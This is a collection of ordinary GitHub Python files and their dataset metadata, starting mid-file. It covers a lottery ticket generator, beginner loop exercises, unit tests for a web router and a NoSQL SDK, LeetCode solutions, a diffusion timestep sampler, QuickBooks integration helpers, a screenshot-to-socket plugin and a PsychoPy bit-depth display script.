\nHi,\nYour ticket is:\n{ticket}\n
\"\n email_ticket.send_email(player, \"Your Python Generated Lotto Numbers\", ticket, html_tickets)\n else:\n print(ticket)\n\n amount_tickets -= 1\n\n\ndef load_contest():\n directory = os.path.dirname(__file__)\n filename = os.path.join(directory, 'config_contests.json')\n\n if not os.path.exists(filename):\n return {}\n\n with open(filename, 'r', encoding='utf-8') as fin:\n return json.load(fin)\n\n\ndef gen_lotto_numbers(choice):\n contest_rules = load_contest()\n lotto_numbers = []\n\n if choice == 'megaball':\n index = 0\n elif choice == 'powerball':\n index = 1\n elif choice == 'eurojackpot':\n index = 2\n else:\n print('Pick a game.')\n\n game = contest_rules['contests'][index]['name']\n ball_amount = contest_rules['contests'][index]['amount'] + 1\n special_ball = contest_rules['contests'][index]['extra']\n first_ball = contest_rules['contests'][index]['start']\n last_ball = contest_rules['contests'][index]['end']\n first_special = contest_rules['contests'][index]['extra_start']\n last_special = contest_rules['contests'][index]['extra_end']\n\n\n print(f'Loading config for {game}')\n print('Printing ticket.....\\n')\n\n for ball in range(1, ball_amount):\n current_pick = random.randint(first_ball, last_ball)\n\n while current_pick in lotto_numbers:\n current_pick = random.randint(first_ball, last_ball)\n\n lotto_numbers.append(current_pick)\n\n for special in range(special_ball):\n lotto_numbers.append(random.randint(first_special, last_special))\n\n return lotto_numbers\n\n\ndef print_ticket(numbers):\n pretty_ticket = \"\"\n for idx, ball in enumerate(numbers):\n pretty_ticket += f'Number {idx + 1} is {ball}, \\n'\n\n return pretty_ticket\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jbettenh/lotto","sub_path":"lotto.py","file_name":"lotto.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2115931775","text":"# 1) Basic - \n# Print all integers from 0 to 150.\n\ndef basic(): \n for i in range(151):\n print(i)\n\nbasic()\n\n# 2) # Multiples of Five - \n# Print all the multiples of 5 from 5 to 1, 000\n\ndef multiples():\n for i in range(5, 1001, 5): \n#format(starting number, end number, multiples of)\n print(i)\n\nmultiples()\n\n# 3) Counting, the Dojo Way - Print integers 1 to 100. \n# If divisible by 5, print \"Coding\" instead. \n# If divisible by 10, print \"Coding Dojo\".\n\ndef DojoWay():\n for i in range(1, 101):\n if i % 10 == 0:\n print(\"Coding Dojo\")\n elif i % 5 == 0:\n print(\"Coding\")\n else: \n print(i)\n\nDojoWay()\n\n# 4) Whoa. That Sucker's Huge -\n# Add odd integers from 0 to 500,000, and \n# print the final sum.\n\ndef whoa():\n final_sum = 0\n for i in range(1, 500000, 2):\n final_sum += i\n print(final_sum)\n\nwhoa()\n\n# 5) Countdown by Fours - \n# Print positive numbers starting at 2018, \n# counting down by fours.\n\ndef countdown():\n for i in range(2018, 0, -4):\n print(i)\n\ncountdown()\n\n# 6) Flexible Counter - \n# Set three variables: lowNum, highNum, mult. \n# Starting at lowNum and going through highNum, \n# print only the integers that are a multiple of mult. 
\n# For example, if lowNum=2, highNum=9, and mult=3, \n# the loop should print 3, 6, 9 (on successive lines)\n\ndef flexible_counter(low_num, high_num, mult):\n    for i in range(low_num, high_num + 1):\n        if i % mult == 0:\n            print(i)\n\nflexible_counter(1, 21, 3)\n\n\n\n","repo_name":"jxxparker/Python","sub_path":"Fundamentals/2_ForLoopBasic1/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}{"seq_id":"33251931331","text":"def get_score():\n    s = int(input(\"Please enter the student's score: \"))\n    assert 0 <= s <= 100,'score out of range'\n    # equivalent to: if bool(): raise AssertionError()\n    return s\ntry:\n    score = get_score()\n    print(\"The student's score is\",score)\nexcept AssertionError as err:\n    print(err)","repo_name":"wangredfei/nt_py","sub_path":"Base/ex14/lx8_score.py","file_name":"lx8_score.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}{"seq_id":"8634393638","text":"from unittest import TestCase\n\nfrom flode.di.container import Container\nfrom flode.http_context_builder import HttpContextBuilder\nfrom flode.http_method import HttpMethod\nfrom flode.http_status import HttpStatus\nfrom flode.middleware.endpoint.endpoint import Endpoint\nfrom flode.middleware.endpoint.endpoint_result import EndpointResult\nfrom flode.middleware.router.route import Route\nfrom flode.middleware.router.route_pattern import RoutePattern\nfrom flode.middleware.router.router import Router\nfrom flode.middleware.router.router_options import RouterOptions\n\n\nclass TestRouter(TestCase):\n    def test_get_routes_return_list_of_added_routes(self) -> None:\n        class FirstController:\n            @Route()\n            def first_endpoint(self) -> EndpointResult: return EndpointResult(\"\")\n\n            @Route(\"/nested\")\n            def second_endpoint(self) -> EndpointResult: return EndpointResult(\"\")\n\n        class SecondController:\n            @Route()\n            def first_endpoint(self) -> EndpointResult: return EndpointResult(\"\")\n\n            @Route(\"/nested\")\n            def second_endpoint(self) -> EndpointResult: return EndpointResult(\"\")\n\n        opts = RouterOptions()\n        opts.add_endpoint(\"/first\", FirstController)\n        opts.add_endpoint(\"/second\", SecondController)\n        router = Router(opts, Container())\n\n        expected_routes = [RoutePattern(\"/first\"), RoutePattern(\"/first/nested\"), RoutePattern(\"/second\"),\n                           RoutePattern(\"/second/nested\")]\n        self.assertEqual(expected_routes, router.get_routes())\n\n    def test_response_status_is_set_to_404_not_found_when_no_endpoint_could_be_found_for_path(self) -> None:\n        router = Router(RouterOptions(), Container())\n        context = HttpContextBuilder().path(\"/user/profile\").build()\n        router.handle_request(context)\n        self.assertEqual(HttpStatus.NOT_FOUND, context.response.status)\n\n    def test_endpoint_is_set_on_context_when_matching_request_path(self) -> None:\n        class MyController:\n            @Route()\n            def my_method(self) -> EndpointResult: return EndpointResult(\"\")\n\n        container = Container()\n        opts = RouterOptions()\n        opts.add_endpoint(\"/test\", MyController)\n        router = Router(opts, container)\n        context = HttpContextBuilder().path(\"/test\").build()\n        router.handle_request(context)\n        controller = container.get_service(MyController)\n        expected_endpoint = Endpoint(controller.my_method, Route(\"/test\"))\n        self.assertEqual(expected_endpoint, context.get_endpoint())\n\n    def test_endpoints_can_specify_what_http_methods_they_support(self) -> None:\n        class MyController:\n            
@Route(http_methods=[HttpMethod.GET])\n def get_method(self) -> EndpointResult:\n return EndpointResult(\"GET method\")\n\n @Route(http_methods=[HttpMethod.POST])\n def post_method(self) -> EndpointResult:\n return EndpointResult(\"POST method\")\n\n container = Container()\n opts = RouterOptions()\n opts.add_endpoint(\"/\", MyController)\n router = Router(opts, container)\n controller = container.get_service(MyController)\n\n get_context = HttpContextBuilder().path(\"/\").http_method(HttpMethod.GET).build()\n post_context = HttpContextBuilder().path(\"/\").http_method(HttpMethod.POST).build()\n router.handle_request(get_context)\n router.handle_request(post_context)\n\n expected_get_endpoint = Endpoint(controller.get_method, Route())\n expected_post_endpoint = Endpoint(controller.post_method, Route(http_methods=[HttpMethod.POST]))\n self.assertEqual(expected_get_endpoint, get_context.get_endpoint())\n self.assertEqual(expected_post_endpoint, post_context.get_endpoint())\n\n def test_endpoints_can_support_multiple_http_methods(self) -> None:\n class MyController:\n @Route(http_methods=[HttpMethod.GET, HttpMethod.POST, HttpMethod.DELETE])\n def multi_method(self) -> EndpointResult:\n return EndpointResult(\"MULTI METHOD\")\n\n container = Container()\n opts = RouterOptions()\n opts.add_endpoint(\"/\", MyController)\n router = Router(opts, container)\n controller = container.get_service(MyController)\n\n get_context = HttpContextBuilder().path(\"/\").http_method(HttpMethod.GET).build()\n post_context = HttpContextBuilder().path(\"/\").http_method(HttpMethod.POST).build()\n delete_context = HttpContextBuilder().path(\"/\").http_method(HttpMethod.DELETE).build()\n router.handle_request(get_context)\n router.handle_request(post_context)\n router.handle_request(delete_context)\n expected_endpoint = Endpoint(controller.multi_method, Route(http_methods=[HttpMethod.GET, HttpMethod.POST,\n HttpMethod.DELETE]))\n self.assertEqual(expected_endpoint, get_context.get_endpoint())\n self.assertEqual(expected_endpoint, post_context.get_endpoint())\n self.assertEqual(expected_endpoint, delete_context.get_endpoint())\n","repo_name":"diddi-/flode","sub_path":"tests/unit/flode/middleware/router/test_router.py","file_name":"test_router.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16449166440","text":"#coding:utf-8\nfrom socket import *\nimport os\nimport struct\nimport base64\nimport zlib\nimport json\nimport sys\nfrom PIL import Image\nfrom PIL import ImageGrab\nimport core\n\nfilename = 'test.txt'\n\n#file_size = struct.calcsize\n\ndef startSend(data,param):\n j = json.loads(param)\n tmp = base64.b64encode(data)\n tmp = zlib.compress(tmp)\n addr = (j[\"ip\"],int(j[\"port\"]))\n try:\n sendSock = socket(AF_INET,SOCK_STREAM)\n sendSock.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)\n sendSock.connect(addr)\n sendSock.send(tmp)\n sendSock.close()\n js = \"top.connectLog('%s')\" % \"发送完毕\";\n core.runJs(js)\n except:\n (ErrorType, ErrorValue, ErrorTB) = sys.exc_info()\n (errno, err_msg) = ErrorValue\n error = \"连接服务器失败: %s, errno=%d\" % (err_msg, errno)\n js = \"top.connectLog('%s')\" % error;\n core.runJs(js)\n\ndef readFile(filename):\n file = open(filename,\"rb\")\n return file.read()\n\ndef sendFile(filename,param):\n data = readFile(filename)\n startSend(data,param)\n\ndef grab():\n im = ImageGrab.grab()\n im.save(\"tmp.jpeg\",'jpeg')\n\ndef startGrab(param):\n grab()\n sendFile(\"tmp.jpeg\",param)\n return 
\"ok\"\nif __name__ == '__main__':\n startGrab(\"{\\\"ip\\\":\\\"127.0.0.1\\\",\\\"port\\\":\\\"8000\\\"\")\n\n","repo_name":"xuedev/HGui_Python_Win32","sub_path":"plugins/socket_gather.py","file_name":"socket_gather.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"75144009851","text":"import unittest\nfrom time import time\n\nfrom borneo import (\n Consistency, GetRequest, IllegalArgumentException, PutRequest, TableLimits,\n TableNotFoundException, TableRequest, TimeToLive, TimeUnit)\nfrom parameters import table_name, timeout\nfrom test_base import TestBase\nfrom testutils import get_row\n\nrow = None\ntb_expect_expiration = None\nversion = None\nserial_version = 0\n\n\n# noinspection PyArgumentEqualDefault\nclass TestGet(unittest.TestCase, TestBase):\n @classmethod\n def setUpClass(cls):\n cls.set_up_class()\n table_ttl = TimeToLive.of_hours(16)\n create_statement = (\n 'CREATE TABLE ' + table_name + '(fld_sid INTEGER, fld_id INTEGER, \\\nfld_long LONG, fld_float FLOAT, fld_double DOUBLE, fld_bool BOOLEAN, \\\nfld_str STRING, fld_bin BINARY, fld_time TIMESTAMP(7), fld_num NUMBER, \\\nfld_json JSON, fld_arr ARRAY(STRING), fld_map MAP(STRING), \\\nfld_rec RECORD(fld_id LONG, fld_bool BOOLEAN, fld_str STRING), \\\nPRIMARY KEY(SHARD(fld_sid), fld_id)) USING TTL ' + str(table_ttl))\n create_request = TableRequest().set_statement(\n create_statement).set_table_limits(TableLimits(100, 100, 1))\n cls.table_request(create_request)\n global row, tb_expect_expiration, version\n row = get_row()\n put_request = PutRequest().set_value(row).set_table_name(table_name)\n version = cls.handle.put(put_request).get_version()\n tb_expect_expiration = table_ttl.to_expiration_time(\n int(round(time() * 1000)))\n global serial_version\n serial_version = cls.handle.get_client().serial_version\n\n @classmethod\n def tearDownClass(cls):\n cls.tear_down_class()\n\n def setUp(self):\n self.set_up()\n self.key = {'fld_sid': 1, 'fld_id': 1}\n self.get_request = GetRequest().set_key(self.key).set_table_name(\n table_name).set_timeout(timeout)\n\n def tearDown(self):\n self.tear_down()\n\n def testGetSetIllegalKey(self):\n self.assertRaises(IllegalArgumentException, self.get_request.set_key,\n 'IllegalKey')\n self.get_request.set_key({'fld_sid': 1})\n self.assertRaises(IllegalArgumentException, self.handle.get,\n self.get_request)\n self.get_request.set_key({'fld_id': 1})\n self.assertRaises(IllegalArgumentException, self.handle.get,\n self.get_request)\n\n def testGetSetIllegalKeyFromJson(self):\n self.assertRaises(ValueError, self.get_request.set_key_from_json,\n 'IllegalJson')\n self.get_request.set_key_from_json('{\"invalid_field\": \"key\"}')\n self.assertRaises(IllegalArgumentException, self.handle.get,\n self.get_request)\n\n def testGetSetIllegalTableName(self):\n self.assertRaises(IllegalArgumentException,\n self.get_request.set_table_name, {'name': table_name})\n self.get_request.set_table_name('IllegalTable')\n self.assertRaises(TableNotFoundException, self.handle.get,\n self.get_request)\n\n def testGetSetIllegalCompartment(self):\n self.assertRaises(IllegalArgumentException,\n self.get_request.set_compartment, {})\n self.assertRaises(IllegalArgumentException,\n self.get_request.set_compartment, '')\n\n def testGetSetIllegalConsistency(self):\n self.assertRaises(IllegalArgumentException,\n self.get_request.set_consistency,\n 'IllegalConsistency')\n\n def testGetSetIllegalTimeout(self):\n 
self.assertRaises(IllegalArgumentException,\n self.get_request.set_timeout, 'IllegalTimeout')\n self.assertRaises(IllegalArgumentException,\n self.get_request.set_timeout, 0)\n self.assertRaises(IllegalArgumentException,\n self.get_request.set_timeout, -1)\n\n def testGetWithoutKey(self):\n self.get_request.set_key(None)\n self.assertRaises(IllegalArgumentException, self.handle.get,\n self.get_request)\n\n def testGetGets(self):\n self.assertEqual(self.get_request.get_key(), self.key)\n self.assertIsNone(self.get_request.get_compartment())\n\n def testGetIllegalRequest(self):\n self.assertRaises(IllegalArgumentException, self.handle.get,\n 'IllegalRequest')\n\n def testGetNormal(self):\n result = self.handle.get(self.get_request)\n self.check_get_result(result, row, version, tb_expect_expiration,\n TimeUnit.HOURS, True, (serial_version > 2))\n self.check_cost(result, 1, 2, 0, 0)\n\n def testGetEventual(self):\n self.get_request.set_consistency(Consistency.EVENTUAL)\n result = self.handle.get(self.get_request)\n self.check_get_result(\n result, row, expect_expiration=tb_expect_expiration,\n timeunit=TimeUnit.HOURS, ver_eq=False,\n mod_time_recent=(serial_version > 2))\n self.check_cost(result, 1, 1, 0, 0)\n\n def testGetNonExisting(self):\n self.get_request.set_key({'fld_sid': 2, 'fld_id': 2})\n result = self.handle.get(self.get_request)\n self.check_get_result(result)\n self.check_cost(result, 1, 2, 0, 0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"oracle/nosql-python-sdk","sub_path":"test/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"78"} +{"seq_id":"13341858597","text":"def solver(arr):\n ans = []\n if len(arr) == 1:\n return [arr[:]]\n \n for i in range(len(arr)):\n popped = arr.pop(0)\n perms = solver(arr)\n\n for perm in perms:\n perm.append(popped)\n \n ans.extend(perms)\n arr.append(popped)\n\n return ans\n\narr = [1,2,3]\nprint(solver(arr))","repo_name":"joemama2021/Local-Codes__LeetCode__","sub_path":"arrypermutations.py","file_name":"arrypermutations.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29412924660","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:IronmanJay\n# email:1975686676@qq.com\n\nclass Solution:\n def minimumRecolors(self, blocks: str, k: int) -> int:\n sumW = 0\n for i in range(k):\n if blocks[i] == 'W':\n sumW += 1\n res = sumW\n for i in range(k,len(blocks)):\n if blocks[i] == 'W':\n sumW += 1\n if blocks[i - k] == 'W':\n sumW -= 1\n res = min(res,sumW)\n return res\n\nif __name__ == '__main__':\n solution = Solution()\n blocks = \"WBBWWBBWBW\"\n k = 7\n res = solution.minimumRecolors(blocks,k)\n print(res)\n","repo_name":"IronmanJay/Python_Project","sub_path":"LeetCode/SlidingWindow/p2379_MinimumRecolorsToGetKConsecutiveBlackBlocks.py","file_name":"p2379_MinimumRecolorsToGetKConsecutiveBlackBlocks.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"78"} +{"seq_id":"6904322829","text":"\"\"\"Reorder List\n\nLEETCODE: 143\nCOMPANY: LinkedIn\n\nYou are given the head of a singly linked-list. The list can \nbe represented as:\n\nL0 → L1 → … → Ln - 1 → Ln\nReorder the list to be on the following form:\n\nL0 → Ln → L1 → Ln - 1 → L2 → Ln - 2 → …\nYou may not modify the values in the list's nodes. 
Only nodes \nthemselves may be changed.\n\nInput: head = [1,2,3,4]\nOutput: [1,4,2,3]\n\nInput: head = [1,2,3,4,5]\nOutput: [1,5,2,4,3]\n\n\nSolution\n- What we will need to do is split the list in half to be able\n to alternate the list index being returned.\n- In the second half of the split list, we reverse the order \n of the links so it starts at the end and works backwards.\n- In order to be able to split the list in half correctly, we \n create two pointers that will be placed on the 1st and 2nd \n index values. We will move pointer1 (slow pointer) by one, \n while we move pointer2 (fast pointer) by two spaces.\n- If there are even elements in the linked list then the two \n lists will be split evenly. If the number of elements are odd\n then pointer1 will always have the most amount of elements.\n- The slow pointer (pointer1) will always stop at the half-way \n mark, and the fast pointer (pointer2) will stop when there are \n no more elements to loop through. \n- To be able to shift the pointers after breaking the links, we\n would have to create a temporary variable that will store \n the proceeding node before the link is broken. This allows us \n to still acees the node values after we break the link and \n shift our pointers to the next node.\n\"\"\"\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def reorderList(self, head: ListNode) -> None:\n # find middle\n slow, fast = head, head.next\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n\n # reverse second half\n second = slow.next\n prev = slow.next = None\n while second:\n tmp = second.next\n second.next = prev\n prev = second\n second = tmp\n\n # merge two halfs\n first, second = head, prev\n while second:\n tmp1, tmp2 = first.next, second.next\n first.next = second\n second.next = tmp1\n first, second = tmp1, tmp2\n","repo_name":"SinclairPythonAkoto/Algorithms","sub_path":"Alogorithm_Roadmap/6_Linked_List/reorder_list.py","file_name":"reorder_list.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37910389868","text":"import torch\nfrom einops import repeat\n\nfrom src.diffusion.timestep_sampler.diffusion_timestep_sampler import DiffusionTimestepSampler\n\n\nclass PartialSampler(DiffusionTimestepSampler):\n \"\"\"\n Partial sampler:\n\n Constant over a fixed portion of the sequence (e.g second half/quarter) and 0 everywhere else\n \"\"\"\n\n def __init__(self, max_timestep: int = 1000, start_fraction: float = 0.5, end_fraction: float = 1):\n \"\"\"\n Args:\n max_timestep: Maximum timestep to sample\n start_fraction: Fraction of the sequence to start the constant portion\n end_fraction: Fraction of the sequence to end the constant portion\n \"\"\"\n super().__init__(max_timestep=max_timestep)\n self.start_fraction = start_fraction\n self.end_fraction = end_fraction\n\n def sample_timesteps(self, input_size: torch.Size = None) -> torch.LongTensor:\n \"\"\"\n Args:\n input_size [B, S, D]: Shape of the input tensor, used to determine the batch size and sequence length\n\n Returns:\n Long Tenor [B]: Only one timestep per batch\n \"\"\"\n tx = torch.zeros(input_size[0], input_size[1]).long()\n start = int(self.start_fraction * input_size[1])\n end = int(self.end_fraction * input_size[1])\n t = torch.randint(0, self.max_timestep, (input_size[0],)).long()\n t = repeat(t, \"b -> b s\", s=end - start)\n 
tx[:, start:end] = t\n return tx\n","repo_name":"rkstgr/jukebox_diffusion","sub_path":"src/diffusion/timestep_sampler/partial_sampler.py","file_name":"partial_sampler.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"30426987408","text":"import base64\nimport json\nfrom typing import Dict\n\nimport requests\nfrom django.conf import settings\nfrom future.moves.urllib.parse import urlencode\nfrom fyle_accounting_mappings.models import MappingSetting\nfrom qbosdk import InternalServerError, NotFoundClientError, UnauthorizedClientError, WrongParamsError\n\nfrom apps.fyle.models import ExpenseGroupSettings\nfrom apps.mappings.queue import (\n schedule_auto_map_ccc_employees,\n schedule_auto_map_employees,\n schedule_bill_payment_creation,\n schedule_tax_groups_creation,\n)\nfrom apps.quickbooks_online.queue import schedule_qbo_objects_status_sync, schedule_reimbursements_sync\nfrom apps.workspaces.models import WorkspaceGeneralSettings\nfrom fyle_qbo_api.utils import assert_valid\n\n\ndef generate_qbo_refresh_token(authorization_code: str, redirect_uri: str) -> str:\n \"\"\"\n Generate QBO refresh token from authorization code\n \"\"\"\n api_data = {'grant_type': 'authorization_code', 'code': authorization_code, 'redirect_uri': redirect_uri}\n\n auth = '{0}:{1}'.format(settings.QBO_CLIENT_ID, settings.QBO_CLIENT_SECRET)\n auth = base64.b64encode(auth.encode('utf-8'))\n\n request_header = {'Accept': 'application/json', 'Content-type': 'application/x-www-form-urlencoded', 'Authorization': 'Basic {0}'.format(str(auth.decode()))}\n\n token_url = settings.QBO_TOKEN_URI\n response = requests.post(url=token_url, data=urlencode(api_data), headers=request_header)\n\n if response.status_code == 200:\n return json.loads(response.text)['refresh_token']\n\n elif response.status_code == 401:\n raise UnauthorizedClientError('Wrong client secret or/and refresh token', response.text)\n\n elif response.status_code == 404:\n raise NotFoundClientError('Client ID doesn\\'t exist', response.text)\n\n elif response.status_code == 400:\n raise WrongParamsError('Some of the parameters were wrong', response.text)\n\n elif response.status_code == 500:\n raise InternalServerError('Internal server error', response.text)\n\n\ndef create_or_update_general_settings(general_settings_payload: Dict, workspace_id):\n \"\"\"\n Create or update general settings\n :param workspace_id:\n :param general_settings_payload: general settings payload\n :return:\n \"\"\"\n assert_valid('reimbursable_expenses_object' in general_settings_payload and general_settings_payload['reimbursable_expenses_object'], 'reimbursable_expenses_object field is blank')\n\n assert_valid('employee_field_mapping' in general_settings_payload and general_settings_payload['employee_field_mapping'], 'employee_field_mapping field is blank')\n\n if 'auto_map_employees' in general_settings_payload and general_settings_payload['auto_map_employees']:\n assert_valid(general_settings_payload['auto_map_employees'] in ['EMAIL', 'NAME', 'EMPLOYEE_CODE'], 'auto_map_employees can have only EMAIL / NAME / EMPLOYEE_CODE')\n\n if general_settings_payload['auto_create_destination_entity']:\n assert_valid(general_settings_payload['auto_map_employees'] and general_settings_payload['employee_field_mapping'] == 'VENDOR', 'auto_create_destination_entity can be set only if auto map is enabled and employee mapped to vendor')\n\n if general_settings_payload['je_single_credit_line']:\n 
assert_valid(\n general_settings_payload['reimbursable_expenses_object'] == 'JOURNAL ENTRY' or general_settings_payload['corporate_credit_card_expenses_object'] == 'JOURNAL ENTRY',\n 'je_single_credit_line can be set only if reimbursable_expenses_object or \\\n corporate_credit_card_expenses_object is JOURNAL ENTRY',\n )\n\n if general_settings_payload['sync_fyle_to_qbo_payments'] or general_settings_payload['sync_qbo_to_fyle_payments']:\n assert_valid(\n general_settings_payload['reimbursable_expenses_object'] == 'BILL',\n 'sync_fyle_to_qbo_payments / sync_qbo_to_fyle_payments can be set \\\n only if reimbursable_expenses_object is BILL',\n )\n\n workspace_general_settings = WorkspaceGeneralSettings.objects.filter(workspace_id=workspace_id).first()\n\n map_merchant_to_vendor = True\n\n if workspace_general_settings:\n map_merchant_to_vendor = workspace_general_settings.map_merchant_to_vendor\n\n # TODO: remove this hack once workspace settings are saved\n if workspace_id == 98:\n category_sync_version = 'v1'\n else:\n category_sync_version = workspace_general_settings.category_sync_version if workspace_general_settings else 'v2'\n\n general_settings, _ = WorkspaceGeneralSettings.objects.update_or_create(\n workspace_id=workspace_id,\n category_sync_version=category_sync_version,\n defaults={\n 'employee_field_mapping': general_settings_payload['employee_field_mapping'],\n 'import_projects': general_settings_payload['import_projects'],\n 'import_categories': general_settings_payload['import_categories'],\n 'import_tax_codes': general_settings_payload['import_tax_codes'],\n 'change_accounting_period': general_settings_payload['change_accounting_period'],\n 'charts_of_accounts': general_settings_payload['charts_of_accounts'],\n 'auto_map_employees': general_settings_payload['auto_map_employees'],\n 'auto_create_destination_entity': general_settings_payload['auto_create_destination_entity'],\n 'auto_create_merchants_as_vendors': general_settings_payload['auto_create_merchants_as_vendors'],\n 'reimbursable_expenses_object': general_settings_payload['reimbursable_expenses_object'] if 'reimbursable_expenses_object' in general_settings_payload and general_settings_payload['reimbursable_expenses_object'] else None,\n 'corporate_credit_card_expenses_object': general_settings_payload['corporate_credit_card_expenses_object']\n if 'corporate_credit_card_expenses_object' in general_settings_payload and general_settings_payload['corporate_credit_card_expenses_object']\n else None,\n 'sync_fyle_to_qbo_payments': general_settings_payload['sync_fyle_to_qbo_payments'],\n 'sync_qbo_to_fyle_payments': general_settings_payload['sync_qbo_to_fyle_payments'],\n 'map_merchant_to_vendor': map_merchant_to_vendor,\n 'je_single_credit_line': general_settings_payload['je_single_credit_line'],\n 'map_fyle_cards_qbo_account': general_settings_payload['map_fyle_cards_qbo_account'],\n 'import_vendors_as_merchants': general_settings_payload['import_vendors_as_merchants'],\n },\n )\n\n if general_settings.map_merchant_to_vendor and general_settings.corporate_credit_card_expenses_object in ('CREDIT CARD PURCHASE', 'DEBIT CARD EXPENSE'):\n expense_group_settings = ExpenseGroupSettings.objects.get(workspace_id=workspace_id)\n expense_group_settings.import_card_credits = True if general_settings.corporate_credit_card_expenses_object == 'CREDIT CARD PURCHASE' else False\n\n ccc_expense_group_fields = expense_group_settings.corporate_credit_card_expense_group_fields\n ccc_expense_group_fields.append('expense_id')\n 
expense_group_settings.corporate_credit_card_expense_group_fields = list(set(ccc_expense_group_fields))\n expense_group_settings.ccc_export_date_type = 'spent_at'\n\n expense_group_settings.save()\n\n if general_settings.corporate_credit_card_expenses_object == 'JOURNAL ENTRY' or general_settings.reimbursable_expenses_object in ('JOURNAL ENTRY', 'EXPENSE'):\n expense_group_settings = ExpenseGroupSettings.objects.get(workspace_id=workspace_id)\n expense_group_settings.import_card_credits = True\n expense_group_settings.save()\n\n schedule_tax_groups_creation(import_tax_codes=general_settings.import_tax_codes, workspace_id=workspace_id)\n\n schedule_auto_map_employees(general_settings_payload['auto_map_employees'], workspace_id)\n\n schedule_auto_map_ccc_employees(workspace_id)\n\n schedule_bill_payment_creation(general_settings.sync_fyle_to_qbo_payments, workspace_id)\n\n schedule_qbo_objects_status_sync(sync_qbo_to_fyle_payments=general_settings.sync_qbo_to_fyle_payments, workspace_id=workspace_id)\n\n schedule_reimbursements_sync(sync_qbo_to_fyle_payments=general_settings.sync_qbo_to_fyle_payments, workspace_id=workspace_id)\n\n return general_settings\n\n\ndef delete_cards_mapping_settings(workspace_general_settings: WorkspaceGeneralSettings):\n if not workspace_general_settings.map_fyle_cards_qbo_account or not workspace_general_settings.corporate_credit_card_expenses_object:\n mapping_setting = MappingSetting.objects.filter(workspace_id=workspace_general_settings.workspace_id, source_field='CORPORATE_CARD', destination_field='CREDIT_CARD_ACCOUNT').first()\n if mapping_setting:\n mapping_setting.delete()\n","repo_name":"fylein/fyle-qbo-api","sub_path":"apps/workspaces/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21741754821","text":"import socket\nimport time\nimport os\n\n\ndef check_port_status(host,port):\n sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sk.settimeout(3)\n try:\n sk.connect((host, port))\n return \"open\"\n except Exception:\n return \"close\"\n sk.close()\n\n\nif __name__ == '__main__':\n\n services = [\n ('192.168.7.11', 9000, 'jumpserver'),\n ]\n msg = []\n connection = False\n while not connection:\n for s in services:\n result = check_port_status(s[0],s[1])\n print(\"%s : %s \" %(s[2],result))\n if result == \"open\":\n connection = True\n else:\n time.sleep(60)\n os.system('190204084208765161.mp4')\n","repo_name":"vanvank/lotus-ops","sub_path":"monitor/wait_port_to_be_open.py","file_name":"wait_port_to_be_open.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"22495734990","text":"import numpy as np\nimport psychopy.event\nimport psychopy.visual\n\n\n\n'''\n[09/06/2022 08:05] Simon Rushton\nIf you have a few mins you could write a quick psychopy program for me,\nusing pyglet, that draws 1024 stripes next to each other.\nFor a first band of stripes the luminance should be -1+2*(i/1023) where i is 0->1023 and\nnext to that we want a stripes that are -1+2*((i%4)/1023).\nThat should give us two grey-scale gradients to compare, one that should be 10bit and\none that should be 8bit. 
That provides a very easy way of checking we are really getting 10bit -\nthe 10bit stripe should be a lot smoother than the 8 bit stripe.\n\nadapted from script for Ponzo illusion at \nhttps://www.djmannion.net/psych_programming/vision/draw_shapes/draw_shapes.html\n\n'''\n\n\n# get 1024 (10-bit) values between -1 and 1.\nlist_10_bit = [-1+2*(i/1023) for i in list(range(1024))]\n\n# get 256 (8-bit) values between -1 and 1, each repeated*4 to give 1024 items\n# list_8_bit = [-1+2*(i/256) for i in list(range(256))]\n# list_8_bit = np.repeat(list_8_bit, 4)\nlist_8_bit = [-1+2*((i//4)*4)/1023 for i in list(range(1024))]\n\n\n# print lists of equivalent values from 10-bit and 8-bit lists\n# for idx, (a_10, b_8) in enumerate(zip(list_10_bit, list_8_bit)):\n# print(f\"{idx}: 10-bit: {a_10}, 8-bit: {b_8}\")\n\n\n# # If you want to display on external monitor, set this variable to True\nexternal_monitor=False\n\nuse_screen = 0\nif external_monitor:\n use_screen = 1\n\n# initialize pyglet window\nwin = psychopy.visual.Window(size=[1024, 1024], units=\"pix\", fullscr=True,\n color=[1, 1, 1], winType='pyglet', bpc=[10, 10, 10],\n screen=use_screen)\n\n# define line stimuli\nline = psychopy.visual.Line(win=win, units=\"pix\")\n\n# horizontal positions for lines [-512 to 512]\nx_pos = [i-512 for i in 